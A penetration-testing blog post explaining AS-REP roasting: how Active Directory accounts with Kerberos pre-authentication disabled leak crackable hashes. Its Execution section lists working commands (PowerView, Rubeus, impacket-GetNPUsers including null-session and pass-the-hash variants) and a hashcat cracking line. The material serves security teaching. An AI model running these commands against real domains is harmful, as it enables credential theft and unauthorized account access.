OffSec Series – AS-REP Roasting

https://blog.secarclabs.com/post/offsec-series-as-rep-roasting

Overview

Technique that is used to target weak user account settings in Active Directory, particularly those with the “Do not require Kerberos preauthentication” setting enabled to abuse the lack of Kerberos pre-authentication to retrieve password hashes. This setting allows a user account to request and obtain a service ticket without providing initial authentication, essentially bypassing the need for a password. The hashes can then be cracked offline using tools like hashcat to obtain the passwords.

Kerberos pre-authentication

Kerberos pre-authentication is an optional feature of the Kerberos protocol that can be used to provide stronger authentication between clients and servers. In Kerberos, authentication is performed by exchanging tickets between the client and the Key Distribution Center (KDC). The KDC is a trusted server that maintains a database of user and service accounts and their associated credentials.

When a client requests a ticket for a service, it sends a pre-authentication message(Authentication Server Request (AS-REQ)) to the DC. The timestamp on that message is encrypted with the hash of the user’s password. This message contains information that the DC can use to verify the client’s identity. If the DC can decrypt that timestamp using its own record of the user’s password hash, it will send back an Authentication Server Response (AS-REP) message that contains a Ticket Granting Ticket (TGT) issued by the Key Distribution Center (KDC), which is used for future access requests by the user.

Pre-authentication can help to improve the security of Kerberos by making it more difficult for attackers to impersonate users. By requiring clients to prove their identity before they are granted a ticket, pre-authentication can help to prevent man-in-the-middle attacks and other forms of attack.

Abusing Pre-Auth

An attacker would typically enumerate to identify a list user accounts with Pre-Auth setting disabled. They can then request the encrypted AS-REP (Authentication Service Reply) message from the domain controller, which contains the user’s encrypted credentials. By analyzing the encrypted AS-REP offline, the attacker can attempt to crack the user’s password using various password cracking techniques, such as dictionary attacks or brute force attacks.

If successful, the attacker can obtain the user’s plaintext password, allowing them to gain unauthorized access to the user’s account and potentially escalate their privileges within the network.

Execution

Identifying accounts that could be abused due to AS-REP roasting.

Using PowerView:

Get-DomainUser -PreauthNotRequired

Using AD Module/RSAT tools:

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Using Rubeus

.\Rubeus.exe asreproast

Using impacket-GetNPUsers

# users list dynamically queried with an RPC null session

impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'

# with a users file

impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'

# users list dynamically queried with a LDAP authenticated bind (password)

impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'

# users list dynamically queried with a LDAP authenticated bind (NT hash)

impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'

Example:

Cracking obtained hash using Hashcat

Hashcat Mode:

18200: Kerberos 5, etype 23, AS-REP

sudo hashcat -m 18200 ASREProastables.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

References

https://www.freesoft.org/CIE/RFC/1510/55.htm

https://tools.thehacker.recipes/impacket/examples/getnpusers.py

https://hashcat.net/wiki/doku.php?id=example_hashes

Scroll to Top